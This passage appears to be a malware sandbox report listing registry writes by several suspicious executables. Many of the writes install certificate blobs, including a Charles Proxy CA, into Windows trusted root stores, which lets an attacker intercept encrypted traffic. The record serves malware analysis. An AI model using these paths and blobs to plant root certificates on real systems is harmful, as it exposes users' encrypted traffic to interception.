cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95winit.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDDaliens.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576aliens.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104610300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576jg2_2qua.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f19000000010000001000000018e847daffeaedafa0faaea36340ea790300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104612000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576intro.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13intro.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E34914.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510intro.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd0f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104612000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576jg2_2qua.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 19000000010000001000000018e847daffeaedafa0faaea36340ea790f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104610300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576jg2_2qua.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDDintro.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 19000000010000001000000018e847daffeaedafa0faaea36340ea790f0000000100000020000000f58d226a1455ea81e8c8df37b8c942f342ebbc60a29701fc2895ec13140104610300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd140000000100000014000000f8d0dc54367cf794020f8b92783a5d8a91251f9f2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576intro.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC2514.exe
    Key created\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184Cwinit.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e14.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e14.exe
